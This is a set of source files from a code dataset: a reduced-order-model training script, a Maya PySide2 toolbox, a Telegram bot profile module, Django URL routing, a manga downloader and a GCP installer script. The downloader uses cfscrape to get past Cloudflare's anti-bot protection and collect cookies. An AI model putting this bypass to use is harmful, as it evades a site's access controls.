optimal in the\n regularization hyperparameter space.\n\n# Use 10,000 projected snapshots to learn a ROM of dimension r = 30 and save\n# the one with the regularization resulting in the least training error and\n# for which the integrated POD modes stay within 150% of the training data in\n# magnitude for 60,000 time steps. For the regularization parameters, search\n# starting from λ1 = 300, λ2 = 7000.\n$ python3 step3_train.py --minimize 10000 30 300 7000\n --testsize 60000 --margin 1.5\n\nLoading Results\n---------------\n>>> import utils\n>>> trainsize = 10000 # Number of snapshots used as training data.\n>>> num_modes = 44 # Number of POD modes.\n>>> regs = 1e4, 1e5 # Regularization parameters for Operator Inference.\n>>> rom = utils.load_rom(trainsize, num_modes, reg)\n\nCommand Line Arguments\n----------------------\n\"\"\"\nimport logging\nimport itertools\nimport numpy as np\nimport scipy.optimize as opt\n\nimport rom_operator_inference as roi\n\nimport config\nimport utils\n\n\n_MAXFUN = 100 # Artificial ceiling for optimization routine.\n\n\n# Subroutines =================================================================\n\ndef check_lstsq_size(trainsize, r):\n \"\"\"Report the number of unknowns in the Operator Inference problem,\n compared to the number of snapshots. Ask user for confirmation before\n attempting to solve an underdetermined problem.\n \"\"\"\n # Print info on the size of the system to be solved.\n d = roi.lstsq.lstsq_size(config.MODELFORM, r, m=1)\n message = f\"{trainsize} snapshots, {r}x{d} DOFs ({r*d} total)\"\n print(message)\n logging.info(message)\n\n # If the system is underdetermined, ask for confirmation before proceeding.\n if d > trainsize:\n message = \"LSTSQ SYSTEM UNDERDETERMINED\"\n logging.warning(message)\n if input(f\"{message}! CONTINUE? [y/n] \") != \"y\":\n raise ValueError(message)\n return d\n\n\ndef check_regs(regs):\n \"\"\"Assure that there are two positive regularization parameters.\"\"\"\n if np.isscalar(regs) or len(regs) != 2:\n raise ValueError(\"two regularization parmameters required\")\n if any(λ < 0 for λ in regs):\n raise ValueError(\"regularization parameters must be positive\")\n return regs\n\n\ndef regularizer(r, d, λ1, λ2):\n \"\"\"Return the regularizer that penalizes all operator elements by λ1,\n except for the quadratic operator elements, which are penalized by λ2.\n\n Parameters\n ----------\n r : int\n Dimension of the ROM.\n\n d : int\n Number of unknowns in a single least-squares problem, i.e., the\n number of elements in a single row of the operator matrix O.\n\n λ1 : float\n Regularization parameter for the non-quadratic operators.\n\n λ2 : float\n Regularization parameter for the quadratic operator.\n\n Returns\n -------\n diag(𝚪) : (d,) ndarray\n Diagonal entries of the dxd regularizer 𝚪.\n \"\"\"\n diag𝚪 = np.full(d, λ1)\n diag𝚪[1+r:-1] = λ2\n return diag𝚪\n\n\ndef is_bounded(q_rom, B, message=\"bound exceeded\"):\n \"\"\"Return True if the absolute integrated POD coefficients lie within the\n given bound.\n\n Parameters\n ----------\n q_rom : (r,len(time_domain)) ndarray\n Integrated POD modes, i.e., the direct result of integrating a ROM.\n\n B : float > 0\n The bound that the integrated POD coefficients must satisfy.\n \"\"\"\n if np.abs(q_rom).max() > B:\n print(message+\"...\", end='')\n logging.info(message)\n return False\n return True\n\n\ndef save_trained_rom(trainsize, r, regs, rom):\n \"\"\"Save the trained ROM with the specified attributes.\n\n Parameters\n ----------\n trainsize : int\n Number of snapshots used to train the ROM.\n\n r : int\n Dimension of the ROM. Also the number of retained POD modes\n (left singular vectors) used to project the training data.\n\n regs : two positive floats\n Regularization parameters (non-quadratic, quadratic) used in the\n Operator Inference least-squares problem for training the ROM.\n\n rom : rom_operator_inference.InferredContinuousROM\n Actual trained ROM object. Must have a `save_model()` method.\n \"\"\"\n save_path = config.rom_path(trainsize, r, regs)\n rom.save_model(save_path, save_basis=False, overwrite=True)\n logging.info(f\"ROM saved to {save_path}\")\n\n\n# Main routines ===============================================================\n\ndef train_single(trainsize, r, regs):\n \"\"\"Train and save a ROM with the given dimension and regularization\n hyperparameters.\n\n Parameters\n ----------\n trainsize : int\n Number of snapshots to use to train the ROM.\n\n r : int\n Dimension of the desired ROM. Also the number of retained POD modes\n (left singular vectors) used to project the training data.\n\n regs : two positive floats\n Regularization hyperparameters (non-quadratic, quadratic) to use in\n the Operator Inference least-squares problem for training the ROM.\n \"\"\"\n utils.reset_logger(trainsize)\n\n # Validate inputs.\n d = check_lstsq_size(trainsize, r)\n λ1, λ2 = check_regs(regs)\n\n # Load training data.\n Q_, Qdot_, t = utils.load_projected_data(trainsize, r)\n U = config.U(t)\n\n # Train and save the ROM.\n with utils.timed_block(f\"Training ROM with k={trainsize:d}, \"\n f\"r={r:d}, λ1={λ1:.0f}, λ2={λ2:.0f}\"):\n rom = roi.InferredContinuousROM(config.MODELFORM)\n rom.fit(None, Q_, Qdot_, U, P=regularizer(r, d, λ1, λ2))\n save_trained_rom(trainsize, r, regs, rom)\n\n\ndef train_gridsearch(trainsize, r, regs, testsize=None, margin=1.5):\n \"\"\"Train ROMs with the given dimension over a grid of potential\n regularization hyperparameters, saving only the ROM with the least\n training error that satisfies a bound on the integrated POD coefficients.\n\n Parameters\n ----------\n trainsize : int\n Number of snapshots to use to train the ROM.\n\n r : int\n Dimension of the desired ROM. Also the number of retained POD modes\n (left singular vectors) used to project the training data.\n\n regs : (float, float, int, float, float, int)\n Bounds and sizes for the grid of regularization parameters.\n Linear: search in [regs[0], regs[1]] at regs[2] points.\n Quadratic: search in [regs[3], regs[4]] at regs[5] points.\n\n testsize : int\n Number of time steps for which a valid ROM must satisfy the POD bound.\n\n margin : float >= 1\n Amount that the integrated POD coefficients of a valid ROM are allowed\n to deviate in magnitude from the maximum magnitude of the training\n data Q, i.e., bound = margin * max(abs(Q)).\n \"\"\"\n utils.reset_logger(trainsize)\n\n # Parse aguments.\n d = check_lstsq_size(trainsize, r)\n if len(regs) != 6:\n raise ValueError(\"len(regs) != 6 (bounds / sizes for parameter grid\")\n check_regs(regs[0:2])\n check_regs(regs[3:5])\n λ1grid = np.logspace(np.log10(regs[0]), np.log10(regs[1]), int(regs[2]))\n λ2grid = np.logspace(np.log10(regs[3]), np.log10(regs[4]), int(regs[5]))\n\n # Load training data.\n t = utils.load_time_domain(testsize)\n Q_, Qdot_, _ = utils.load_projected_data(trainsize, r)\n U = config.U(t[:trainsize])\n\n # Compute the bound to require for integrated POD modes.\n M = margin * np.abs(Q_).max()\n\n # Create a solver mapping regularization parameters to operators.\n print(f\"TRAINING {λ1grid.size*λ2grid.size} ROMS\")\n with utils.timed_block(f\"Constructing least-squares solver, r={r:d}\"):\n rom = roi.InferredContinuousROM(config.MODELFORM)\n rom._construct_solver(None, Q_, Qdot_, U, np.ones(d))\n\n # Test each regularization parameter.\n errors_pass = {}\n errors_fail = {}\n for λ1,λ2 in itertools.product(λ1grid, λ2grid):\n with utils.timed_block(f\"Testing ROM with λ1={λ1:5e}, λ2={λ2:5e}\"):\n # Train the ROM on all training snapshots.\n rom._evaluate_solver(regularizer(r, d, λ1, λ2))\n\n # Simulate the ROM over the full domain.\n with np.warnings.catch_warnings():\n np.warnings.simplefilter(\"ignore\")\n q_rom = rom.predict(Q_[:,0], t, config.U, method=\"RK45\")\n\n # Check for boundedness of solution.\n errors = errors_pass if is_bounded(q_rom, M) else errors_fail\n\n # Calculate integrated relative errors in the reduced space.\n if q_rom.shape[1] > trainsize:\n errors[(λ1,λ2)] = roi.post.Lp_error(Q_, q_rom[:,:trainsize],\n t[:trainsize])[1]\n\n # Choose and save the ROM with the least error.\n if not errors_pass:\n message = f\"NO STABLE ROMS for r={r:d}\"\n print(message)\n logging.info(message)\n return\n\n err2reg = {err:reg for reg,err in errors_pass.items()}\n λ1,λ2 = err2reg[min(err2reg.keys())]\n with utils.timed_block(f\"Best regularization for k={trainsize:d}, \"\n f\"r={r:d}: λ1={λ1:.0f}, λ2={λ2:.0f}\"):\n rom._evaluate_solver(regularizer(r, d, λ1, λ2))\n save_trained_rom(trainsize, r, (λ1,λ2), rom)\n\n\ndef train_minimize(trainsize, r, regs, testsize=None, margin=1.5):\n \"\"\"Train ROMs with the given dimension(s), saving only the ROM with\n the least training error that satisfies a bound on the integrated POD\n coefficients, using a search algorithm to choose the regularization\n hyperparameters.\n\n Parameters\n ----------\n trainsize : int\n Number of snapshots to use to train the ROM.\n\n r : int\n Dimension of the desired ROM. Also the number of retained POD modes\n (left singular vectors) used to project the training data.\n\n regs : two positive floats\n Initial guesses for the regularization hyperparameters (non-quadratic,\n quadratic) to use in the Operator Inference least-squares problem\n for training the ROM.\n\n testsize : int\n Number of time steps for which a valid ROM must satisfy the POD bound.\n\n margin : float >= 1\n Amount that the integrated POD coefficients of a valid ROM are allowed\n to deviate in magnitude from the maximum magnitude of the training\n data Q, i.e., bound = margin * max(abs(Q)).\n \"\"\"\n utils.reset_logger(trainsize)\n\n # Parse aguments.\n d = check_lstsq_size(trainsize, r)\n log10regs = np.log10(check_regs(regs))\n\n # Load training data.\n t = utils.load_time_domain(testsize)\n Q_, Qdot_, _ = utils.load_projected_data(trainsize, r)\n U = config.U(t[:trainsize])\n\n # Compute the bound to require for integrated POD modes.\n B = margin * np.abs(Q_).max()\n\n # Create a solver mapping regularization parameters to operators.\n with utils.timed_block(f\"Constructing least-squares solver, r={r:d}\"):\n rom = roi.InferredContinuousROM(config.MODELFORM)\n rom._construct_solver(None, Q_, Qdot_, U, np.ones(d))\n\n # Test each regularization parameter.\n def training_error(log10regs):\n \"\"\"Return the training error resulting from the regularization\n parameters λ1 = 10^log10regs[0], λ1 = 10^log10regs[1]. If the\n resulting model violates the POD bound, return \"infinity\".\n \"\"\"\n λ1, λ2 = 10**log10regs\n\n # Train the ROM on all training snapshots.\n with utils.timed_block(f\"Testing ROM with λ1={λ1:e}, λ2={λ2:e}\"):\n rom._evaluate_solver(regularizer(r, d, λ1, λ2))\n\n # Simulate the ROM over the full domain.\n with np.warnings.catch_warnings():\n np.warnings.simplefilter(\"ignore\")\n q_rom = rom.predict(Q_[:,0], t, config.U, method=\"RK45\")\n\n # Check for boundedness of solution.\n if not is_bounded(q_rom, B):\n return _MAXFUN\n\n # Calculate integrated relative errors in the reduced space.\n return roi.post.Lp_error(Q_, q_rom[:,:trainsize], t[:trainsize])[1]\n\n opt_result = opt.minimize(training_error, log10regs, method=\"Nelder-Mead\")\n if opt_result.success and opt_result.fun != _MAXFUN:\n λ1, λ2 = 10**opt_result.x\n with utils.timed_block(f\"Best regularization for k={trainsize:d}, \"\n f\"r={r:d}: λ1={λ1:.0f}, λ2={λ2:.0f}\"):\n rom._evaluate_solver(regularizer(r, d, λ1, λ2))\n save_trained_rom(trainsize, r, (λ1,λ2), rom)\n else:\n message = \"Regularization search optimization FAILED\"\n print(message)\n logging.info(message)\n\n\n# First draft approach: single regularization parameter, i.e., ================\n# equally penalize all entries of the ROM operators. ==========================\ndef _train_minimize_1D(trainsize, r, regs, testsize=None, margin=1.5):\n \"\"\"Train ROMs with the given dimension(s), saving only the ROM with\n the least training error that satisfies a bound on the integrated POD\n coefficients, using a search algorithm to choose the regularization\n parameter.\n\n Parameters\n ----------\n trainsize : int\n Number of snapshots to use to train the ROM.\n\n r : int\n Dimension of the desired ROM. Also the number of retained POD modes\n (left singular vectors) used to project the training data.\n\n regs : positive floats\n Bounds for the regularization parameter to use in the Operator\n Inference least-squares problem for training the ROM.\n\n testsize : int\n Number of time steps for which a valid ROM must satisfy the POD bound.\n\n margin : float >= 1\n Amount that the integrated POD coefficients of a valid ROM are allowed\n to deviate in magnitude from the maximum magnitude of the training\n data Q, i.e., bound = margin * max(abs(Q)).\n \"\"\"\n utils.reset_logger(trainsize)\n\n # Parse aguments.\n d = check_lstsq_size(trainsize, r)\n log10regs = np.log10(check_regs(regs))\n\n # Load training data.\n t = utils.load_time_domain(testsize)\n Q_, Qdot_, _ = utils.load_projected_data(trainsize, r)\n U = config.U(t[:trainsize])\n\n # Compute the bound to require for integrated POD modes.\n B = margin * np.abs(Q_).max()\n\n # Create a solver mapping regularization parameters to operators.\n with utils.timed_block(f\"Constructing least-squares solver, r={r:d}\"):\n rom = roi.InferredContinuousROM(config.MODELFORM)\n rom._construct_solver(None, Q_, Qdot_, U, 1)\n\n # Test each regularization parameter.\n def training_error(log10reg):\n \"\"\"Return the training error resulting from the regularization\n hyperparameters λ1 = λ2 = 10^log10reg. If the resulting model\n violates the POD bound, return \"infinity\".\n \"\"\"\n λ = 10**log10reg\n\n # Train the ROM on all training snapshots.\n with utils.timed_block(f\"Testing ROM with λ={λ:e}\"):\n rom._evaluate_solver(λ)\n\n # Simulate the ROM over the full domain.\n with np.warnings.catch_warnings():\n np.warnings.simplefilter(\"ignore\")\n q_rom = rom.predict(Q_[:,0], t, config.U, method=\"RK45\")\n\n # Check for boundedness of solution.\n if not is_bounded(q_rom, B):\n return _MAXFUN\n\n # Calculate integrated relative errors in the reduced space.\n return roi.post.Lp_error(Q_, q_rom[:,:trainsize], t[:trainsize])[1]\n\n opt_result = opt.minimize_scalar(training_error,\n method=\"bounded\", bounds=log10regs)\n if opt_result.success and opt_result.fun != _MAXFUN:\n λ = 10**opt_result.x\n with utils.timed_block(f\"Best regularization for k={trainsize:d}, \"\n f\"r={r:d}: λ={λ:.0f}\"):\n rom._evaluate_solver(λ)\n save_trained_rom(trainsize, r, (λ,λ), rom)\n else:\n message = \"Regularization search optimization FAILED\"\n print(message)\n logging.info(message)\n\n\n\n# =============================================================================\nif __name__ == \"__main__\":\n # Set up command line argument parsing.\n import argparse\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.usage = f\"\"\" python3 {__file__} --help\n python3 {__file__} --single TRAINSIZE R REG1 REG2\n python3 {__file__} --gridsearch TRAINSIZE R REG1 ... REG6\n --testsize TESTSIZE --margin TAU\n python3 {__file__} --minimize TRAINSIZE R REG1 REG2\n --testsize TESTSIZE --margin TAU\"\"\"\n # Parser subcommands\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"--single\", action=\"store_true\",\n help=\"train and save a single ROM with regularization \"\n \"hyperparameters REG1 (non-quadratic penalizer) \"\n \"and REG2 (quadratic penalizer)\")\n group.add_argument(\"--gridsearch\", action=\"store_true\",\n help=\"train over the REG3xREG6 grid \"\n \"[REG1,REG2]x[REG4,REG5] of regularization \"\n \"hyperparameter candidates, saving only the \"\n \"stable ROM with the least training error\")\n group.add_argument(\"--minimize\", action=\"store_true\",\n help=\"given initial guesses REG1 (non-quadratic \"\n \"penalizer) and REG2 (quadratic penalizer), use \"\n \"Nelder-Mead search to train and save a ROM that \"\n \"is locally optimal in the regularization \"\n \"hyperparameter space\")\n\n # Positional arguments.\n parser.add_argument(\"trainsize\", type=int,\n help=\"number of snapshots in the training data\")\n parser.add_argument(\"modes\", type=int,\n help=\"number of POD modes used to project the data \"\n \"(dimension of ROM to be learned)\")\n parser.add_argument(\"regularization\", type=float, nargs='+',\n help=\"regularization parameters for ROM training\")\n\n # Other keyword arguments.\n parser.add_argument(\"--testsize\", type=int, default=None,\n help=\"number of time steps for which the trained ROM \"\n \"must satisfy the POD bound\")\n parser.add_argument(\"--margin\", type=float, default=1.1,\n help=\"factor by which the POD coefficients of the ROM \"\n \"simulation are allowed to deviate in magnitude \"\n \"from the training data (default 1.1)\")\n\n # Parse arguments and do one of the main routines.\n args = parser.parse_args()\n if args.single:\n train_single(args.trainsize, args.modes, args.regularization)\n elif args.gridsearch:\n train_gridsearch(args.trainsize, args.modes, args.regularization,\n args.testsize, args.margin)\n elif args.minimize:\n train_minimize(args.trainsize, args.modes, args.regularization,\n args.testsize, args.margin)\n","sub_path":"step3_train.py","file_name":"step3_train.py","file_ext":"py","file_size_in_byte":20518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"637317766","text":"from PySide2 import QtCore\nfrom PySide2 import QtGui\nfrom PySide2 import QtWidgets\nfrom shiboken2 import wrapInstance\n\nimport maya.OpenMaya as om\nimport maya.OpenMayaUI as omui\nimport maya.cmds as cmds\n\n\ndef maya_main_window():\n \"\"\"\n Return the Maya main window widget as a Python object\n \"\"\"\n main_window_ptr = omui.MQtUtil.mainWindow()\n return wrapInstance(long(main_window_ptr), QtWidgets.QWidget)\n\n\nclass PopUpWindow(QtWidgets.QDialog):\n\n def __init__(self, name, parent=None):\n super(PopUpWindow, self).__init__(parent)\n\n self.setWindowTitle(\"{0} Options\".format(name))\n\n self.setWindowFlags(QtCore.Qt.Popup)\n\n self.create_widgets()\n self.create_layout()\n\n def create_widgets(self):\n self.size_sb = QtWidgets.QSpinBox()\n self.size_sb.setRange(1, 100)\n self.size_sb.setValue(12)\n\n self.opacity_sb = QtWidgets.QSpinBox()\n self.opacity_sb.setRange(0, 100)\n self.opacity_sb.setValue(100)\n\n def create_layout(self):\n layout = QtWidgets.QFormLayout(self)\n layout.addRow(\"Size:\", self.size_sb)\n layout.addRow(\"Opacity:\", self.opacity_sb)\n\n\nclass ToolboxButton(QtWidgets.QPushButton):\n\n def __init__(self, name, parent=None):\n super(ToolboxButton, self).__init__(parent)\n\n self.pop_up_window = PopUpWindow(name, self)\n\n def mousePressEvent(self, mouseEvent):\n if(mouseEvent.button() == QtCore.Qt.RightButton):\n\n # pop_up_pos = self.mapToGlobal(mouseEvent.pos())\n # self.pop_up_window.move(pop_up_pos)\n\n pop_up_pos = self.mapToGlobal(QtCore.QPoint(8, self.height() + 8))\n self.pop_up_window.move(pop_up_pos)\n\n self.pop_up_window.show()\n return\n\n super(ToolboxButton, self).mousePressEvent(mouseEvent)\n\n\nclass ToolboxDialog(QtWidgets.QDialog):\n\n IMAGE_DIR = \"D:/Temp/Patreon\"\n\n def __init__(self, parent=maya_main_window()):\n super(ToolboxDialog, self).__init__(parent)\n\n self.setWindowTitle(\"Toolbox\")\n self.setFixedSize(150,40)\n\n if cmds.about(ntOS=True):\n self.setWindowFlags(self.windowFlags() ^ QtCore.Qt.WindowContextHelpButtonHint)\n elif cmds.about(macOS=True):\n self.setWindowFlags(QtCore.Qt.Tool)\n\n self.create_widgets()\n self.create_layout()\n self.create_connections()\n\n def create_widgets(self):\n self.pencil_btn = ToolboxButton(\"Pencil\")\n self.pencil_btn.setFixedSize(30, 30)\n self.pencil_btn.setCheckable(True)\n self.pencil_btn.setChecked(True)\n self.pencil_btn.setFlat(True)\n self.pencil_btn.setIcon(QtGui.QIcon(\"{0}/pencil.png\".format(ToolboxDialog.IMAGE_DIR)))\n\n self.brush_btn = ToolboxButton(\"Brush\")\n self.brush_btn.setFixedSize(30, 30)\n self.brush_btn.setCheckable(True)\n self.brush_btn.setFlat(True)\n self.brush_btn.setIcon(QtGui.QIcon(\"{0}/brush.png\".format(ToolboxDialog.IMAGE_DIR)))\n\n self.eraser_btn = ToolboxButton(\"Eraser\")\n self.eraser_btn.setFixedSize(30, 30)\n self.eraser_btn.setCheckable(True)\n self.eraser_btn.setFlat(True)\n self.eraser_btn.setIcon(QtGui.QIcon(\"{0}/eraser.png\".format(ToolboxDialog.IMAGE_DIR)))\n\n self.text_btn = ToolboxButton(\"Text\")\n self.text_btn.setFixedSize(30, 30)\n self.text_btn.setCheckable(True)\n self.text_btn.setFlat(True)\n self.text_btn.setIcon(QtGui.QIcon(\"{0}/text.png\".format(ToolboxDialog.IMAGE_DIR)))\n\n def create_layout(self):\n main_layout = QtWidgets.QHBoxLayout(self)\n main_layout.setContentsMargins(5, 5, 5, 5)\n main_layout.setSpacing(5)\n main_layout.addWidget(self.pencil_btn)\n main_layout.addWidget(self.brush_btn)\n main_layout.addWidget(self.eraser_btn)\n main_layout.addWidget(self.text_btn)\n main_layout.addStretch()\n\n def create_connections(self):\n self.pencil_btn.clicked.connect(self.on_checked_state_changed)\n self.brush_btn.clicked.connect(self.on_checked_state_changed)\n self.eraser_btn.clicked.connect(self.on_checked_state_changed)\n self.text_btn.clicked.connect(self.on_checked_state_changed)\n\n def on_checked_state_changed(self):\n button = self.sender()\n\n self.pencil_btn.setChecked(button == self.pencil_btn)\n self.brush_btn.setChecked(button == self.brush_btn)\n self.eraser_btn.setChecked(button == self.eraser_btn)\n self.text_btn.setChecked(button == self.text_btn)\n\n\nif __name__ == \"__main__\":\n\n try:\n toolbox_dialog.close() # pylint: disable=E0601\n toolbox_dialog.deleteLater()\n except:\n pass\n\n toolbox_dialog = ToolboxDialog()\n toolbox_dialog.show()\n","sub_path":"CZ_Tutorials/010_PySide2 for Maya (Vol. 3)/25-pyside2_for_maya_vol_3-pop_up_windows_part_2/toolbox_dialog_start.py","file_name":"toolbox_dialog_start.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"93364493","text":"from pymongo import MongoClient\nimport os\nfrom telegram import ReplyKeyboardMarkup, KeyboardButton, ReplyKeyboardRemove\n\nMONGO_LINK = os.environ.get('MONGO_LINK')\nMONGO_DB = os.environ.get('MONGO_DB')\ndb = MongoClient(MONGO_LINK)[MONGO_DB]\n\n\ndef get_user(db, effective_user, message):\n user = db.users.find_one({\"user_id\": effective_user.id})\n if not user:\n return False\n if user:\n return user\n\n\ndef create_user(db, effective_user, message, user_data):\n user = {\n \"user_id\": effective_user.id,\n \"first_name\": effective_user.first_name,\n \"last_name\": effective_user.last_name,\n \"username\": effective_user.username,\n \"chat_id\": message.chat.id,\n \"profile_name\": user_data['name'],\n \"profile_age\": user_data['age'],\n \"profile_gender\": user_data['gender'],\n }\n db.users.insert_one(user)\n return user\n\n\ndef profile_start(bot, update):\n text = 'Привет! Меня зовут Эляша и я твой персональный ассистент для поднятия настроения. Я еще маленький и глупый, но благодаря тебе я стану лучше.Скажи, как тебя зовут?'\n update.message.reply_text(text, reply_markup=ReplyKeyboardRemove())\n return 'name'\n\n\ndef profile_get_name(bot, update, user_data):\n user_data['name'] = update.message.text\n text = f'Оке, сколько тебе лет?'\n update.message.reply_text(text)\n return 'age'\n\n\ndef profile_get_age(bot, update, user_data):\n user_data['age'] = update.message.text\n reply_keyboard = [['Определенно, мужчина', 'Определенно, женщина', 'Один из шестидесяти гендеров']]\n update.message.reply_text(text='А ты мальчик, девочка или пока не определился?',\n reply_markup=ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True, resize_keyboard=True))\n return 'gender'\n\n\ndef profile_get_gender(bot, update, user_data):\n if update.message.text == 'Определенно, мужчина':\n user_gender = 'male'\n elif update.message.text == 'Определенно, женщина':\n user_gender = 'female'\n else:\n user_gender = None\n user_data['gender'] = user_gender\n update.message.reply_text(f'Я запомнил ;-) ')\n update.message.reply_text(f'Спасибо за ответы! Теперь мы стали чуточку ближе) ')\n create_user(db, update.effective_user, update.message, user_data)\n return greet_user(bot, update)\n\n\n\n\ndef start_keyboard():\n start_keyboard = ReplyKeyboardMarkup([\n ['Погугли'], ['Поболтай со мной'], ['Подними мне настроение!'], ['Обо мне']]\n , resize_keyboard=True\n )\n return start_keyboard\n\n\ndef greet_user(bot, update):\n user = get_user(db, update.effective_user, update.message)\n if not user:\n text = 'Привет! Я твой персональный ассистент по настроению! Я еще маленький и глупый, но благодаря тебе я стану лучше.'\n update.message.reply_text(text)\n profile_start(bot, update)\n user_name = user['profile_name']\n text = f'Привет,{user_name}! Я рад тебя видеть! Чем я могу помочь тебе сегодня?'\n update.message.reply_text(text, reply_markup=start_keyboard())\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"113742200","text":"\"\"\"act_complementaryMedicine URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom act_complementaryMedicine import view\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^get/', view.get_test),\n url(r'^post/', view.post_test),\n url(r'^i1/',view.register),\n url(r'^i2/',view.repeatCheck),\n url(r'^i3/',view.login),\n url(r'^i4/',view.retrievePassword),\n url(r'^i5/',view.getDoctorBasicInfo),\n url(r'^i6/',view.getDoctorDetailedInfo),\n url(r'^i7/',view.updateDoctorInfo),\n url(r'^i8/',view.getExpGroups),\n url(r'^i9/',view.getExpGroupPatientsInfo),\n url(r'^i10/',view.addExpGroup),\n url(r'^i11/',view.deleteExpGroup),\n url(r'^i12/',view.updateExpGroup),\n url(r'^i13/',view.addPatientToExpGroup),\n url(r'^i14/',view.removePatientfromExpGroup),\n url(r'^i15/',view.getPatientsBasicInfo),\n url(r'^i16/',view.getPatientDetailedInfo),\n url(r'^i17/',view.addPatientInfo),\n url(r'^i18/',view.updatePatientInfo),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"act_complementaryMedicine/act_complementaryMedicine/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"137749522","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom lxml.html import document_fromstring\nimport re\nimport cfscrape\nfrom helpers.exceptions import UrlParseError\n\ndomainUri = 'http://www3.mangafreak.net'\n\n\ndef get_main_content(url, get=None, post=None):\n if not cookies:\n get_manga_name(url)\n _ = '{}/Manga/{}'.format(domainUri, get_manga_name(url))\n return get(_)\n\n\ndef get_volumes(content=None, url=None, get=None, post=None):\n return []\n\n\ndef get_archive_name(volume, index: int = None):\n return ''\n\n\ndef get_images(main_content=None, volume=None, get=None, post=None):\n return []\n\n\ndef get_manga_name(url, get=None):\n # http://www3.mangafreak.net/Manga/Onepunch_Man\n # http://www3.mangafreak.net/Read1_Onepunch_Man_1\n\n global cookies\n\n if not cookies:\n # anti-\"cloudflare anti-bot protection\"\n with cfscrape.get_tokens(url) as scraper:\n if scraper is not None:\n cookies = []\n for i in scraper[0]:\n cookies.append({\n 'value': scraper[0][i],\n 'domain': '.mangafreak.net',\n 'path': '/',\n 'name': i,\n })\n cookies.append(scraper[1])\n\n test = re.search('/Manga/([^/]+)/?', url)\n if test:\n return test.groups()[0]\n test = re.search('/Read\\d+_(.+)_\\d+', url)\n if test:\n return test.groups()[0]\n raise UrlParseError()\n\n\ndownload_zip_only = True\n\n\ndef get_zip(main_content=None, volume=None, get=None, post=None):\n links = document_fromstring(main_content).cssselect('.manga_series_list a[download]')\n return [i.get('href') for i in links]\n\n\ncookies = None\n","sub_path":"providers/mangafreak_net.py","file_name":"mangafreak_net.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"527101784","text":"#!/usr/bin/env python3\nfrom enum import Enum\nimport time\nimport subprocess\nimport os\nimport sys\n\n\nclass Color(Enum):\n HEADER = '\\033[95m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n ORANGE = '\\033[93m'\n RED = '\\033[91m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\ndef text_color(text, color, space_before=True):\n return '{space}{color}{text}{end}'.format(space='\\n' if space_before else '', color=color.value, text=text, end='\\033[0m')\n\n\ndef abort():\n print(text_color('Deployment canceled.', Color.RED))\n sys.exit(0)\n\n\nif __name__ == '__main__':\n print(text_color('┌────────────────────────────────────────────────┐', Color.HEADER, space_before=False))\n print(text_color('�� Welcome to Data Quality Manager GCP installer! │', Color.HEADER, space_before=False))\n print(text_color('└────────────────────────────────────────────────┘', Color.HEADER, space_before=False))\n\n project_id = subprocess.check_output(['gcloud', 'config', 'list', '--format', 'value(core.project)']).decode('utf-8').replace('\\n','')\n\n prompt = input(text_color('You are about to deploy DQM within GCP project \"{}\", continue? (Y/n) '.format(project_id), Color.BOLD))\n if prompt.lower() == 'n':\n abort()\n\n print(text_color('Downloading sources...', Color.BLUE))\n subprocess.check_output(['git', 'clone', 'https://github.com/google/dqm.git'])\n\n print(text_color('Installing frontend dependencies...', Color.BLUE))\n subprocess.check_output(['npm', 'install'], cwd='dqm/frontend')\n\n print(text_color('Building frontend (it can take a little while)...', Color.BLUE))\n subprocess.check_output(['npm', 'run', 'build'], cwd='dqm/frontend')\n\n print(text_color('Installing pipenv...', Color.BLUE))\n subprocess.check_output(['pip3', 'install', '--user', 'pipenv'])\n\n print(text_color('Installing Python libs...', Color.BLUE))\n subprocess.check_output(['python3', '-m', 'pipenv', 'install', '--dev'], cwd='dqm/backend')\n\n print(text_color('Enabling APIs...', Color.BLUE))\n subprocess.check_output(['gcloud', 'services', 'enable', 'analytics.googleapis.com'])\n subprocess.check_output(['gcloud', 'services', 'enable', 'analyticsreporting.googleapis.com'])\n\n print(text_color('Creating App Engine application...', Color.BLUE))\n try:\n subprocess.check_output(['gcloud', 'app', 'create'])\n except subprocess.CalledProcessError as e:\n print(text_color('Failed to create App Engine app (this is normal if you have an existing app).', Color.ORANGE))\n prompt = input(text_color('Continue anyway and deploy on existing app? (Y/n) ', Color.BOLD))\n if prompt.lower() 